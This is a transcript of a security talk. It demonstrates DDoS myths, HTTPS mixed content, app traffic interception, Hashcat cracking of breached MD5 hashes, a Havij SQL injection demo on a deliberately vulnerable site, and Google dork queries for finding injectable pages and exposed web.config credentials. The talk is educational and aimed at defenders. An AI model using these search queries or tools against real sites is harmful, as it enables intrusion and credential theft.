I'm not responsible for anything you do with the information I've provided in this video for you. So if you're going to do that with this information which I've given you, I'm not responsible for anything you do with the information I've provided in this video. So yeah now that I've got that out of the way let's get started. So what we've got to do is we've got a loadup command prompt. I like my color green. Then what we want to do is we want to type ping and then I've got a bunch of random IPs here. So ping and then just paste it out or you can type out hyphen t hyphen out and then the amount of packets. So this is the command it pings them and this is the IP it will ping. This is how long you want it to do it for. So I've put a limited timer. This is how many packets you want to send right here. So let's just hit that and as you can see it's already began the process of DDoSing the IP. Now there's one thing I'd just like to say like when you do this sometimes it will come up with like a timeout message. This means that the IP could be wrong or in fact your connection is not strong enough to send packets or could just be a general error because it could do all of this and then just say timeout and then carry on. So it could just be like the pings that I actually sent. So once you're done you hit control C and sent 43 packets. They received 43 packets. They lost nothing on their computer so it's a 0% loss. So basically they must have a strong connection. You've got to do this for a while with this method. So go outside and play while you DDoS and then mustn't. I don't know. But yeah. How do you like that? That's awesome isn't it? Did you know you could do that? I like the bit where he says just go outside and play while you DDoSing them. It gives you a bit of a sense of how sophisticated our adversaries are. So yeah often this is kids right? And we spoke a little bit about kids in the last talk. And recently we saw this as well. So we had the Paris attacks and Anonymous says we're going to declare war on ISIS. We're going to take down ISIS. And this was posted on Facebook. And I saw the most epic comment ever left about Anonymous coming after ISIS. All right. So here's how this session is going to work. I'm going to just show lots of different things that are not in any one deck or any one process. I'm going to sort of pick things that have been showing recently that I think are interesting. And we're going to do a lot of hands on stuff as well. So it's meant to be sort of very practical. And basically I'm just going to keep going until I run out of time. And then we have to have a break. So I want to show you a few different things around security. I want to try and make it pretty practical as well. And one thing I thought we might start with is we talk a lot about HTTPS and how do we do HTTPS right? And this is the thing with HTTPS. It's not like do you have it or do you not have it? There are lots of different levels of getting it right. Lots of different levels of screwing it up. And I want to give you an example. Here's one that really, really bugs me. And it's from an Aussie site. I'm going to start by insulting the Aussies. So when I go to Qantas, we get this nice scene. But when I go to Qantas over HTTPS, watch what happens up in the address bar. You got to watch it carefully. Let's try reloading that. Watch it this time. You see what happened? I'll show you again. Just watch carefully right here. It goes green and it's like there's hope. It's secure. And then you think they take it away. It disappears again straight away. So anyone know what this happens? Yes. Oh, no, not you. Anyone else? Anyone who's not an owl? So what's happening here is explained when you click on here, it goes you've loaded this page securely, but there are other resources which are not secure. Now this is really basic, right? Like you should put secure things on a secure page. But what they're doing is they're loading the page over HTTPS. So you can trust the page. No one has been able to view the page in transit. No one has been able to modify the page in transit. But then something else is happening which is making it insecure. There's another insecure resource being put on the page. Now there's something else kind of cool you can do as of the last day, which is that if you have the latest and greatest version of Chrome, you can now go in and you can go to the security tab. And in the security tab, we get a nice little report. So this security tab, go and get this, brand new. It's been in the beta for a while. Let's just hit the public airways. And we can go in here and we can see what the problem is. And we can see that there was a non-secure origin, which was quantis.com.au. And we can see that everything else here was secure. And it's kind of interesting because then when we go down and we actually have a look at the console, we can see the problem that was explained here in the console. Mixed content. The page here was loaded securely, but it requested this image insecurely. Why do you do that? You requested this image insecurely as well. So basically they've loaded this sprite in insecure fashion. This sprite has taken away their green padlock and their green HTTPS. And browsers keep evolving in the way they do this. So what Chrome used to do is you used to get like a little orange triangle up until a few months ago. And now they're going, you just don't get a padlock at all. You get nothing, which is cool. Google also wants to move Chrome to the point where rather than saying that a page, let's take my blog for a second, rather than say this page loads, I don't have HTTPS. There are other reasons for that we might get into later. And I just got a white page. They want to get to the point where there's a like a red cross. So some visual indicator which says you can't trust this. You can't trust it because it hasn't been loaded securely. And this is good, right? So you keep sort of raising the bar, forcing people to go towards HTTPS. A really good resource for this sort of stuff is SSL Labs. Who's used SSL Labs before? I don't need to show you then because that's most people. But use this in case you haven't. So this will go to a website and it will come back and it will tell you everything that is either good or bad about it. So if I take something like my Have I Been Poned address, plug it into here and run it. It'll come back and eventually it will say it's got an A grade and a Zura has done things right. And I'm just running on a Zura and it's basically a Zura's implementation of HTTPS. So this sort of stuff is good. We're kind of continually raising the bar. Now I want to show you something interesting. This is something that really drives me nuts. Let's go to somewhere English. Oh, it hasn't warned me. I wonder if it hasn't warned me because I'm here. Anyone know what I'm looking for? Let's try HSBC. Wow, no cookie warnings. Why no cookie warnings? Who's got a site that does a cookie warning? Do you guys do that here? Yeah? Do you like it? So you know what I mean. Everyone sees these cookie warnings and I look at this from Australia and I go, what are these European people so worried about? What's the problem with the cookies? And I wrote something a little while ago which was like just really bad UX patterns. So things like you go to a website and you just get a full screen banner and you have to wait for the banner to load. If ever you go to anything on Forbes, I don't know if anyone here look at Forbes, they do this. If we go somewhere like that, why are you doing this to me? I don't want to see the quote of the day. I don't want to wait and I don't want whatever the hell this is down here. I don't even know what that is. Why are you giving me ads? And then you get to continue. So I write about all these really nasty practices. But the cookie one was interesting because I said the cookies are a bad UX experience. Particularly mobile, you go there and it's like half your screen is a cookie warning and no one seems to like it. But here's the interesting thing with that because people say we have to do it because it's EU legislation and you could be tracked. If you have cookies, you could be tracked. And I sort of say, well, you can be tracked anyway because you can go somewhere like this. And you go, am I unique.org? You go to am I unique.org and you ask it to fingerprint your browser. And what it does is it goes away and it looks at various attributes of your browser and your user agent settings and it's going to come back and tell you how unique you are. So here we go down the bottom line. The interesting to see if you guys run this as well, see if you get the same results. 132,000 people have tested this and there is no one else like me. I'm an individual. I'm unique. Isn't it nice? So I don't have to send cookies back to a tracker who then track me as I move around. All you have to be able to do to track someone is get them to make an HTTP request. So if you're like double click or Google Analytics or any of these sort of things, so long as you can get the person to make a request, then you can track them. And have a look at how it does it. This many people using Chrome, wow, I'm only 0.2% of people using Chrome 48. I told you it was new. I literally updated it this morning. And okay, that is going to change and that might change your thumbprint, but you could always be smart enough to say if all the other attributes are the same and Chrome has revved one version, then you're probably the same person. It's not an exact science. Cookies aren't an exact science. People use different browsers. Well, they delete the cookies or whatever it may be. So I thought this was interesting and have a look at your results as well because you'll almost certainly find that you are one of like 130,000 plus people. So the cookie law thing is kind of pointless. And now you guys can use this as ammunition to say we shouldn't be doing it because we can track it all anyway. So that's an interesting one. Let's have a look at something really different and we might look at mobile apps. So obviously these days, these things are really popular. We've got a heap of different apps on here. And the curious thing about the apps is that many of them will talk to API backends and many of the API backends are doing really screwy things. Really screwy security things, really screwy performance things. And here's what I thought I might show you. I'm just going to pick something from one of my recent talks. And we might pick, I think, what did I do? No, I did this. I did this in NDC a while ago. Alright, so here's how this works. What you do is you get your mobile phone. And if you've got an i-thing, this is how the i-things work. You get your i-thing and you jump into, that was the very end of it. What happened there? Ah, I know why. Alright, you go into your network settings. So you go into whatever Wi-Fi network it is at the moment. You go into your HTTP proxy settings. You set your server as the IP address of your PC or your Mac or whatever device it is that you want to proxy through. And you run it over that port. And what you can then do if you're using something like Fidler is you can catch every request that the device sends through. So when I go into Fidler, normally what I'm seeing here is every request from my host. When I proxy the device, I can see every request from the device that goes through the PC. It's really cool. So you see all the same sort of traffic that you normally see if you're used to using Fidler or Charles on a Mac except you see the stuff that your mobile apps are doing. Now, what I wanted to show you is these guys here, British Airways. British Airways have an app. And what happens in the British Airways app is that if you are a member of the Silver or Gold Executive Club, you can get Wi-Fi passwords. But you've got to be a member. There's no other way to get the Wi-Fi passwords unless you know how to proxy your device. And then what you can do is you can go and load this previous archive that I created. This is what happens when British Airways loads their app. Makes three requests. One of those requests is to this path. If we copy that URL that it loads and we jump over into a browser somewhere, that one will do, there's your Wi-Fi passwords. Right? So what happens is it loads the Wi-Fi passwords before you authenticate. And then they're all just sitting there on the device and their security is that they basically just make the Wi-Fi passwords visible. That's how it works. That's the entire mechanism of authentication, which is kind of scurry. So all of that's already there on the device. Now, that one's bad. I'll show you another one that's even worse. What tends to happen is developers make this assumption that because they have built the APIs and they've built the apps, that that's the way they'll always talk together. You know, they own the ecosystem, but what they miss is that anyone who sits in the middle can actually see the traffic. They can see everything that goes backwards and forwards. And I want to give you an example because I checked a... Oh, that's talking to me. I checked a mobile app recently. And the mobile app I checked is one called Evo Magazine. It's a car magazine. It looks like this. This is the mobile app. And you go to the app store and you download it, and it's a 25-megabyte app. And then after you download it, you can sort of browse through all the editions, which you can see here, all the editions of the magazine. And then if you want to buy one, you click on it and you enter some payment details and then you get access to it. 25 megabytes to download. How much data do you reckon it downloads when you first open it? Who wants to take a guess? I'll take any guess. Any guess that's not Nile. It is actually about two gigs. It's pretty close. So this is the trace just here. And if we select it all and we go to our statistics, what we can see is it actually downloads about 1.8 gigabytes with the zip files. Why does it do this? Because when you go and you actually have a look at the body size, and we go down to the biggest ones, it downloads all of these 75 megabytes or so editions of the magazine. And if we go and pick one that's a little bit smaller, what you'll see is that we can still just jump over to the browser and download it. It's thinking, ooh, you could download it yesterday. That is curious. Let's try another one. Maybe that edition's been removed. But the point here, regardless of whether it actually loads or not, and it does load this one, is that all the editions are already on the device. So, okay, A, from a performance perspective, maybe not so good, because you've just chewed up a couple of gigabytes of my bandwidth. But B, you don't need to authenticate. There's a public URL. Any of you can go there right now and get that edition of the magazine. If you're a little bit good with HTML and JavaScript and CSS, you can recreate the magazine on your own website. You can download it from Evo. So this is what they do. And my assumption is that they're doing it because it's a really nice sort of performance behavior. It's like you buy the magazine, and magically it's just there. You know, you've just downloaded a 75-megabyte magazine like that because it's already on the device, right? You never actually have to authenticate to the service to download it. So do this with your devices. You go home, I know it sounds kind of geeky, but it's kind of cool. You go home and you proxy it and you just see all the stuff it does and you see this kind of stuff. Someone recently said, take a look at the FoxTel app. So FoxTel gives us cable television in Australia. And they have an electronic programming guide, and you have all the little icons of the channels, you know, a little Discovery icon, a little Disney icon, and they're tiny. But when they're downloaded to the iPad, they're massive. They're 3,000 pixels square. And I showed this in a talk once, and a guy came up to me afterwards and he said, I know why that happens. I worked on that app. He said, this is the way the designers gave them to us. Not a security thing, but an interesting little sort of performance issue there. So that one is problematic. I'll do something else. Let's have a bit of a look at passwords. And I've got a little video here to show you for passwords. And then we might do a quick bit of password cracking as well. So recently, there's a really good example here from Jimmy Kimmel. And what he did is he went out onto the streets and he asked people about how they store their passwords, or rather how they create their passwords. Check this out. We're talking about cybersecurity today and how safe people's passwords are. What is one of your online passwords currently? It is my dog's name, and the year I graduated from high school. What kind of dog do you have? I have a chivalry of Papillon. And what's its name? Jamison. Jamison. And where did you go to school? I went to school back in Greensburg, Pennsylvania. What school? Hempfield area senior high school. Oh, when did you graduate? In 2009. Oh, great. Getting passwords is easy. You don't actually have to crack them. It's like you just ask, what was your password? But this is actually interesting too, because it's a good sort of social engineering example where the reporter is, she's not coming on too heavy, right? Like she doesn't just say, give me your password. She says, how do you create your password? That's the dog's name in the year I graduated. And then she starts this dialogue, right? So it starts having this conversation. What kind of dog do you have? And anyone who has a dog wants to talk about their dog, right? They're going to cough up the information. And she kind of leads the person down this road to the point where she gets the answer out of them. So it's really interesting to remember that even when we do our best with the security, physical, digital security of our systems, the security of our humans is still really crap, right? Like they still succumb to these things. But let's actually take a look at some password cracking just very quickly to put it into context for anyone who hasn't seen how this works. What I'm going to do is take an example here, which is what I did in my workshop the other day. So I showed you Stratfor before, and Stratfor had all of these passwords. And all of these passwords were stored as MD5. So you know how we did a search and we found that it was Stratfor and we found 12,000 people or something used them. Now, what we're going to do is actually jump into Hashcat. Who's used Hashcat before? There are a few people. Excellent. So this won't be new for some of you, but for the vast majority of you, you weren't seen this before. So I'm going to look at CUDA Hashcat. So CUDA is going to run in my Nvidia graphics card. And in here I have Stratfor hashes. And these are all the hashes from that Stratfor data breach. There's about 860,000 or something in there. And what I'm going to do now is I'm going to take one of these commands, which is going to target Stratfor hashes. In fact, I think I'm going to do this one. And what we're going to do with this command is it's going to take those Stratfor hashes. And it's going to recalculate hashes that are passwords anywhere between 6 and 10 characters, lowercase, uppercase, decimal. And it's just going to sort of create these hashes on the fly in the GPU. And we're going to see how many of them actually get cracked. And the interesting thing here is just how fast it goes. And normally I sort of say to people, how fast do you think we can crack hashes in a GPU? So for someone who has not worked in HashCat before and knows the answer, what do we reckon? How fast might we create hashes in a GPU? Who wants to guess? MD5. Someone who doesn't know the answer because otherwise it kind of messes it up. Two million a second. Any other guesses? How many? Billions. Holy shit, you've got a fast computer. Billions. Okay. So we end up. Now this is just a little machine here. So this is not going to be as fast as a dedicated GPU in a big machine. But what we're doing now is just feeding in hashes. And it's going to start to warm itself up. And oh, you know what I've got to do, actually? Let's do this. I've got to delete the ones I did earlier on because otherwise it goes through and it does the same ones again. So we're going to delete the POT file down here. Get rid of that guy. All right, let's try that again. Back to there. Run. So here's the thing with hash cracking. And now here we go with cracking hashes. It doesn't look like really fast. I mean, it looks really fast, but it's much, much faster than what it looks like. So this is actually doing. Let's just pause and get a status here. When I press pause, it's going so fast, there's so much buffered to go to the console. It actually takes a while. What it's doing is it's actually calculating MD5 hashes on the fly and then comparing them to the ones in the database. And then if it actually finds a match of that hash, then it knows what the plain text value is. And in this case, we're ripping through and we've done this. How many we've calculated so far. We've recovered 6,900 of those hashes already, which is kind of nice. It normally runs in this machine. It does in the order of, I think I saw about 18 million per second on my little laptop the other day. But to the question about how fast could we do it on other hardware, when we look at hash cat, and this is where it sort of gets really interesting. Let's move to there and we go and we look at a standard machine. So what they do is they say, here are some examples. So a machine running an AMD HD 7970, which is a fast GPU or was a fast GPU. It's about five or six years old now. You would buy it, I guess in US dollar terms for about $300 at the time. A GPU of that class can crack MD five hashes that fast, eight and a half billion a second. So not million. It can calculate that many hashes per second, which is just massive. And that's like the old hardware, right? Like we've now had Moore's law and things have progressed and things have got faster. But that's how fast it was going. Now, the curious thing about this as well is that that is just if you have one. So there's a company called Strixia Group. Let's run by a friend of mine who create devices that look like this. And what they do is they put eight of those GPUs in one rack. So now we're like what 64 billion hashes a second. And then they have lots of racks. And the whole thing gets parallelized to the point where they can crack all of this sort of stuff enormously quickly. So the main lesson out of this is that you got to go and have a look at something like the OWASP password cheat sheet. Where they talk about using a password hashing algorithm where you can have a work factor. So something like Bcrypt where you can say, I would like my GPU or CPU, depending on where it's being calculated, to work this hard or that hard or that hard or however hard it needs to work such that you can't calculate billions a second, but that your application doesn't run terribly when you get 10 people trying to log on at once. So you need one of these adaptive algorithms that actually makes it slower. And that's what Patrion who I showed you before did. So Patrion had Bcrypt and they had a work factor 12, which would have made it really, really hard to crack just about anything other than terrible passwords. So good news there on the hash cracking front. Let's try something else. We might try talking about DDoS for a second, because DDoS comes up a lot, distributed denial of service attacks. Last week, anonymous, anonymous DDoS Nissan. Did anyone see this? Why would anonymous DDoS Nissan? I'll give you a hint. It has to do with whales. That seems fair, right? Like Japan kills whales, therefore anonymous will attack a car company. DDoS is basically just a kid throwing their toys. You know, they have a tantrum, it gets over, people move on, it does no long lasting damage. But that's effectively what it is. Now the interesting thing with DDoS is that you can go to this link, map.ipviking.com. You fire that up and you put it in full screen because it looks really awesome in full screen. Usually. There we go. So this starts to fire up, we should see a map appear in a moment as well. And it's showing us real time DDoS attacks. And it's kind of cool, like it's kind of mesmerizing. You get to see things like the origin, the types, the targets. Can you see that there's usually a bit of a pattern? For some reason the traffic generally tends to move from the east to the west. I don't know why that is. We see the same country sort of featuring a lot. So we see a lot of these DDoS attacks and it's interesting to look at things like the attack types as well. So some of them are running over Telnet, other ones are running over UDP. Sometimes they run over NTP, the network time protocol. So these attacks exploiting different protocols in order to try and send as many malformed packets as possible. Yeah. That's a good question. How does it distinguish DDoS traffic? Does anyone know? Can you tell me if you figure it out? I honestly don't know. I don't know how these guys actually do their measurements. I just know it's mesmerizing. They do have a bunch of other info on there. But it's kind of cool to sort of see how often this data is flowing around. And every now and then you just see, particularly out of China, you would just see like a massive whack of traffic go west over to the US. So DDoS is a real problem. And it is something that keeps occurring a lot and we particularly see it continually occur with kids. Yep. Question? How do they know if an attack is originally distributed? If it's distributed, well a lot of it originates from the one country still. So let's have a look at what else we got here. Oh, that's my wife. That's what happens when you leave your Facebook notifications on. I'm not sure exactly how they do their measurements. There are a couple of other services that do same things. I mean, you could obviously do it at the switch level at large ISPs within different countries. I guess they've got to identify also that the traffic is malicious. You know, some of these are done over HTTP or UDP, where we have a lot of traffic flowing backwards and forwards anyway. Talk a little bit more about DDoS. And grab a couple of things here. So one of the things that we have often seen in the past with DDoS is stuff like this. All right. Everyone seen this before? So we'll just see all of these tweets. Fire up your lasers. Point your lasers at whatever the hell they want to point them at today. We saw stuff like this happen against PayPal. So PayPal stopped taking payments for WikiLeaks around about 2011. And all the kids got on the Twitter and said, okay, what you got to do is you got to point Loic over there. Anyone seen Loic before? A few people? Free software. You plug in a URL and then you say target. And it just throws random packets at it. Now think again about the type of kids that I spoke about in the last talk. Like they've got no idea of the ramifications of what it is they're doing. All they know is that somebody on the internet said, point your lasers at this address. And if you get enough kids around the world doing this at the same time, they get to take stuff down. We saw this sort of attack happen against Steam over Christmas. Not necessarily with Loic. I think they were using a different tool. But Steam got DDoS over the Christmas period because kids seem to like taking down gaming services over Christmas. They're just nasty. A year before they were taking down PlayStation Network. And the interesting thing is that when they were attacking Steam, Steam then put on a bunch of other services to try and cope with the extra load. They put on a bunch of other caching engines. And when they put on those caching engines, they also screwed up their session association with the client. So what was happening was that you would go to Steam on the website and you go, that's just interesting. That's someone else's private details. Because they cached the identities, they tried to remove the load from the back end. They implemented more caching, but they effectively lost the affinity between the client and the session. So I suspect part of that was just sort of responding under duress as well, which made life very hard for them. All right, so often DDoS is very simple. It is just basically this. Another one that we keep coming back to, and we spoke about this just before, was SQL injection. And I showed you SQL map and someone asked, you know, look, is it basically just put the URL in? These tools are really, really simple and they're really readily available. And I'll give you an example here. So we will go to this site here. Now I use this for a lot of my demos. And I use it in a lot of my workshops. And it has a bunch of different SQL injection risks on it. It's basically a website where you can log on and you can vote for cars that you like. And then there's a leaderboard. It's deliberately vulnerable. There's lots and lots of vulnerabilities on this site. Anyone's welcome to go and play around with them. You can go and exploit SQL injection on here and not go to jail, which is really good. What you can do is say something like, okay, I want to view the Lamborghinis and I'm going to take this URL. Now let's make this a bit more interactive. So who has actually done SQL injection it takes before? Okay, some of you, some of you, you haven't. You want to come do one? Yeah, let's try. Because then if it's you and not me, I'm okay. You'll go to jail. All right, so here's what we're going to do. I'm just going to open up a tool called Havage. Now some of you may have seen this before, but I want to make the point of how easy it is. What's your name first? Pauvel. Pauvel, I'm trying. How am I? Pauvel, okay, Pauvel. So here's what you're going to do. You're going to be the hacker. And what you've got to do is you've got to paste the URL on the clipboard into that target field. Yeah, you paste it over the other one. Very good. Hacking is hard. Look at that. All right. Now you click the analyze button. So what it's doing is it's just making HTTP requests, right? This is not going direct to the database or anything like that. It's just making requests and trying to cause internal exceptions that disclose the structure of the database. And what it's actually done now on the bottom line is it says the DB name is hack yourself first underscore DB. So it's already found the name of the internal database. Now what you do is you go up and you click on the tables button because what you want to try and get is a list of the tables. And then you click on get tables. There we go. And it goes away. Here we go. Now remember while we're doing this, and I'm not saying that Pavel is like a 15 year old kid, right? But this is what 15 year old kids do. They can copy and paste URLs. Now which table should we get, Pavel? Well, I reckon that's kind of public. Let's get user profile. So you just click the check box next to user profile. That's about the hardest thing of SQL injection, like knowing which box to check. All right, let's get the columns. So it goes away and it's going to think because we want to wait until it finds all the columns. And again, all it's doing here, now let's wait till it finds them all before we do anything more. It's just making HTTP requests and it's causing exceptions in the database which bubble up to the user interface. Now if you were a hacker, what data would you get out of user profile? Oh, you're good at this. Yeah, very good. All right, let's get the data. There we go. That's SQL injection. Well done, Pavel. Good one. All right, so this is kind of the point, right? Like it is really, really easy to mount a SQL injection attack. And what we're seeing these kids doing is they're using these tools. And to be honest, like Havage is a bit of a, we'd say a Mickey Mouse tool, right? Like it's very, very basic. It's a nice little gooey interface. The hardcore guys are going to use something like SQL injection. Sorry, they're going to use something like SQL map. SQL map is much more effective. But the interesting thing as well is how people are finding sites to hack. And I'll show you because it's actually really, really easy. What they're doing most of the time is they're jumping into something like a Google search and they're saying let's do a search for in URL. And then they'll say, okay, in URL what I want is question mark ID equals. And then they might narrow it down a bit and they'll say, well, you know, what I really don't like is I don't like, I don't like Swedish sites. We still don't like Sweden here, right? Yeah, very good. Okay, I don't like Swedish sites. And then they would get a list of sites in Sweden which they don't like, which should have an ID equals somewhere in the query string. But actually how we might do this, we'll sort of narrow it down a little bit and we'll say.asp, get like classic asp. All right, because if it's classic asp, we know their chances of having good SQL injection defenses are going to be much lower. And then inevitably what you get is a list of URLs and you get IDs in the end, which are integers, and almost certainly if you pick a bunch of those and you put a non-integer character after the integer, you'll see an internal exception. Because what they're doing is they're just passing this untrusted data into the database and saying just run this, it's just part of a script. So for something like one of these, it's going to be select star from widgets where widget ID equals whatever the user gives us. If it's a one or two or three, it's fine. If it's a three X, the database is going to say it is not a valid integer type. There's a cast exception and that's that. So that's how SQL injection works. You may have also noticed that I have SQL injection on my t-shirt to Bobby Tables. So SQL injection is just a ridiculously easy attack vector. While we're here doing Google searches as well, there's other stuff that you can find via Google because there's just so much stuff that is openly searchable. So I like this one. There's one you can do which is in URL, FTP. So Google will index things over FTP. And then you can go down and say, well, let's get web.config files. Who knows what a web.config is? In an ASP.NET application, the web.config is where you have the connection strings, the machine key, which is effectively your private encryption key, your API keys in your settings, a whole bunch of really, really good juicy stuff. So you go and you run that and then you find all of these sites that have got exposed web.config. Now, what this means is that there is open FTP to these websites. Google can read from them because they allow anonymous access. So not only can you go and get FTP or you can go and get web.config, you can probably go and get anything from any of these sites. Not only can you get stuff, but if they've left anonymous FTP enabled in read access, they've probably also left it in write access. So you can write to these. And when you scroll down through these, you sort of get a sense of the diversity of just how much stuff is there..gov. Washington State Department of Transport. I know that's what it is because this has been here for years. They still haven't fixed it. It's still open. There was a time when I emailed a bunch of sites and I said, hey, you might be interested to know that your FTP is open and anyone can access your stuff. And no one replied. So fair enough. So that is curious. But of course, once you can start running these Google Docs, and this is what I meant earlier on. I said Google Doc, like a carefully crafted Google search. And just in case you really, really want to run other Google Docs, you go to exploit DB Google hacking database, which is there. And you can get a list of Google Docs to run. You can get different types of Google Docs. So maybe you would like to do a search for files containing juicy info. I wonder what's on. I've actually never looked in there. Let's see what's in there. This may not be public forum suitable stuff. Who knows? Okay. So what do we got in here? We've got things like stats generated by we've got Apache server status. So we're probably going to get some logs and things. PDFs with tax returns in them. What's in that one? Then you can run the Google Doc. And then we don't click on any of the links. But you get the idea, right? A lot of it is just index it's public. Looks like some of these are served over FTP as well. Inevitably, some of these are going to have some pretty sensitive personal info in them. We can learn other things by modifying our Google Docs just slightly. So again, this one which search for web.config. Web.config have connection strings in them. Connection strings connect to databases with accounts. Sometimes they connect with very privileged accounts. Anyone know what the SA account is? Right. So the admin. This is the God writes account. If you can connect to a database with SA, you can not only access everything in the database, you can access everything in every other database. You can execute any other commands on the host SQL version. So you can restart it. You can probably execute XP command shell which allows you to execute commands on the host operating system. And if you can't, you can enable XP command shell by hitting another command. If we find results here, then they're extra bad. Here's what I really like about these results. Password. Now, your passwords should have a combination of letters and numbers. Like that. Not like that. Don't do that. And don't use SA. Why do you think people do this? It's very easy. I'll tell you, this makes setting permissions really easy. Because it can just do everything. You don't have to worry about going to every table and setting data reader or data writer or any of that sort of stuff. It's like magic just happens. Makes life very, very simple. So that one's kind of curious. Let me show you something else. And I'm going to open my password manager for a second. Who uses a password manager? Who uses one password? Who uses last pass? Any others? Keep pass? Okay. Use a password manager. Whatever it is. I like one password for various reasons. But frankly, if you're using a password manager, you are so far ahead of everyone else anyway. All right. So what I'm going to do here is I want to just have a quick browse through one of these underground sites. And I'm going to start up my tour browser. Because one of the things I think people find very curious is the fact that we do have a lot of information for sale on the web. And what I want to do is I want to jump into Alpha Bay. Normally I don't do this in like really public talks. But this one is not so public. It's just us being recorded. All right. So everyone remember the Silk Road? Silk Road was a really large underground drug site run by a guy that went under the chute and named Dread Pirate Roberts. Dread Pirate Roberts was actually a guy called Ross Ulbricht. Ross Ulbricht eventually got caught. And one of the reasons he got caught is because he made a Stack Overflow post. I'll show you what it was. I was in this talk here. And this is kind of funny, right? Because he got this guy running this underground drug market. And basically he was asking questions on Stack Overflow related to running his underground drug market. This is the question he asked. This is one of the things that brought him undone. He originally created the profile using an email address that identified him personally. It's one of the ways he got caught. Anyway, Silk Road got taken offline. Of course we've seen other things pop up in its place. Stuff like Alpha Bay. I want to show you what Alpha Bay looks like. 7mp. I'm going to do that. I then have a really, really random username and password. I don't know why I chose Google Google. I think I just fat fingered it. So we do that. Because we're going to have a look at what these guys are actually selling. No idea how this will turn out. And they really like captures, don't they? This is the second one. 9b. Now for those of you who haven't used Tor, it's very easy to get the Tor web browser. You just download it. Google Tor web browser. It does have very legitimate purposes as well. It's a good way of having anonymity. And then inevitably when you have the Tor browser, you can go to these onion websites. So this is running on a server somewhere which we are accessing by going through multiple different Tor relay points. So our traffic is sort of getting bounced around the world such that they don't know who I am and I don't know who they are. Now there have been exploits against Tor. So we saw quite a bit of news a few months ago where Carnegie Mellon University apparently had demonstrated that if you have enough Tor exit nodes that you run, you can start to de-anonymise traffic because you can start to see where the traffic goes. But I wanted to show how easy it is to get in here and find things of this class. Drugs and chemicals, weapons, going to stuff like fraud. Have a look at what we get in fraud. Dumps. Would you like to buy some dumps? US dumps. What do you want in here? You want to buy a Skype man Spotify account? Would you like to buy Spotify accounts? As seen on Krebs and security, he is using Brian Krebs in order to promote his stolen Spotify accounts. Two bucks. I assume that they are probably about two bucks each. The curious thing about this, this is sort of what I was touching on in my previous talk. This is a marketplace that does not look dissimilar to many of the other marketplaces you see online, legitimate marketplaces. We have a seller, you will see that we have things like the vendor level, we have a trust level in here as well. Everything is nice to categorise, good description of it here. They have a whole lot of guidance in here about how to go and use Bitcoin to buy these things in a manner that makes it difficult to trace you. This is how easy it is, it is just a marketplace, you browse around and you buy these things. You can be buying drugs and weapons the same way. Mind you, you have to get them delivered, which is a lot harder than actually getting Spotify accounts delivered. So that is that one, I find that a really sort of curious thing about just how easily accessible this is. It also helps explain why data bridges are valuable, because you can go and sell them. People want to break into systems, your systems, because they can turn around and put them on the market. It is that easy. Okay, something a little bit different as we start to wrap up, one of the interesting things that I have found lately is IoT. So we have all seen a lot of IoT connected things, right? And we are starting to see vulnerabilities in IoT connected things. And actually, you know what, let's start with VTech. We will go back to VTech again. I talked about VTech and they inevitably had vulnerabilities in the APIs behind their IoT things, their tablets. And this was actually some of the data they had taken out. I never got given the photos, which I am quite happy about. But these are the photos of kids and sometimes with their parents that got leaked. Now curiously, so this was VTech, all this data got leaked out in October, November timeframe, because they had things like no transport layer security and they had enumeration risks and SQL injection risks. But the good news is that VTech is now moving on and they are building home security systems. Holy shit. This is at CES. The reporter I worked with on the VTech data breach took a photo of this and sent it to me. He thought I might find it amusing. I certainly did think some things when I saw this. Probably don't buy these ones. I got to feel a little bit sorry actually for these guys because they would have had this stuff being built well in advance of the VTech data breach. And inevitably they are totally different teams, totally different places, totally different approaches to security. But I feel sorry for the people working on these products because they must have seen how bad that VTech data breach was and just gone, oh crap. Now we got to try and sell home security products. Anyway, brings me to things like this. Now some of the interesting IOT stuff that we are seeing pop up lately, some of it is just kind of ridiculous. I don't think this is ridiculous, but I am going to give you some ridiculous examples in a moment too. So this is LFX and this is made by an Aussie company and they are connected light bulbs. And they are really, really cool and I like the idea of having an app where I can sort of change the colour of the bulbs and the brightness and everything. I don't want to have to get off the couch to do stuff. This is our lazy lifestyle today. But anyway, LFX had a vulnerability in the light bulbs. And I know it is a vulnerability in the light bulbs. But the interesting thing about it though is a lot of people say with the IOT emergence if you like, is they say, look in a case like this, alright, if there is a vulnerability in the light bulbs, the attackers may be able to control the light bulbs, do I really care? Like how much of a threat do I think it is if the attackers can put my house into disco mode? Make lights flash. But the vulnerability that they had leaked the network credentials. Right, so now the IOT thing is the attack vector into the network. And I am much more worried about someone having access to my network than what I am about them being able to change the colour of my light bulbs. So LFX came out and they said, yes we had a vulnerability, please patch your light bulbs. How the hell did you patch your light bulbs? I assume you do it with the companion app or something like that. But I guess the curious thing is, are we ready to sort of accept that you have to be able to patch your light bulbs? They also said, don't worry, we are not aware of anyone having been compromised by their light bulbs. Which to me sounds really odd because think about the attack, right? The attack is they get access to the network. If you find that someone is in your network, are you ready to blame the light bulbs? Probably not. Now as weird as this is, and again I would actually like these, they are kind of cool. I have seen two other devices in recent times suffer a similar attack. One is the eye kettle. There is an eye kettle. And the idea is that you can be laying in bed and you can turn your kettle on. Now think about this for a moment because this is pointless, right? What do you do once the kettle boils which takes about two minutes? It doesn't bring the water to you or bring the, you still got to get your ass out of bed and go to the kettle. But the vulnerability with the kettle was they found that you could de-auth the kettle from the wireless network. You could trick the kettle into connecting to your own network and then you could tell net into the kettle with the default pin. Tell net into the kettle. So now you are tell netted into the kettle using the default pin and then you can get the Wi-Fi credentials out for the network. Same problem. So that was the second one I saw and then just the other day when we had CES on, there was a doorbell that had the same problem. A fucking doorbell that connected to the web and the doorbell was disclosing the credentials of the network. And all of this stuff is crazy. But none of it is as crazy as this. Have you seen this? Anyone got one of this? You wouldn't say yes if you did would you? So this is a licksil satis and this is real. It's a Japanese toilet. If you've been to Japan you'll know how crazy they are about their toilets. They're all like rocket ships. And this is the companion app. And these are real screenshots. I didn't fabricate these. You can find them on the internet. And you look at them and you try to figure out what's happening. Like take this middle one. It's in Japanese. I don't know if anyone here speaks Japanese and can tell me. But what do you reckon is happening in the middle screen? Looks like a calendar. Like event driven data. Some kind. I don't know what. And I love the one in the front too. It looks like it's a music player. I did not fabricate this. The toilet is playing. I can't get no satisfaction. And I saw this a couple of years ago and I used it in a talk. And I said we are now approaching the era where we have to be aware of vulnerabilities in our toilet. And eventually they had one. Here's the advisory. This is terrifying. Can you imagine this? I showed this at a talk once and someone said yes this is known as a back door attack. On that note, I think this is a really terrifying thing is a good place to end. Let me see if anyone has any questions about what I've just covered. Or are we all just in shock about the fact that this could happen? Any questions, folks? All right, well hey, if you think of anything, 